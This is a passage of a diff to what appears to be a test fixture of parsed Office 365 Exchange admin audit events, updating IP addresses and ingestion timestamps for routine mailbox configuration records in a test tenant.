bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853413700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6635,12 +6635,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6683,7 +6683,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6695,8 +6695,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177814600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853420Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6716,12 +6716,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6753,7 +6753,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6765,8 +6765,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177817400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853424100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6786,12 +6786,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6834,7 +6834,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6846,8 +6846,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177820200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853428800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6867,12 +6867,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6915,7 +6915,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6927,8 +6927,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177822900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853434300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6948,12 +6948,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6984,7 +6984,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6996,8 +6996,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177825600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853439400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7017,12 +7017,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7065,7 +7065,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7077,8 +7077,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177828300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853445200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 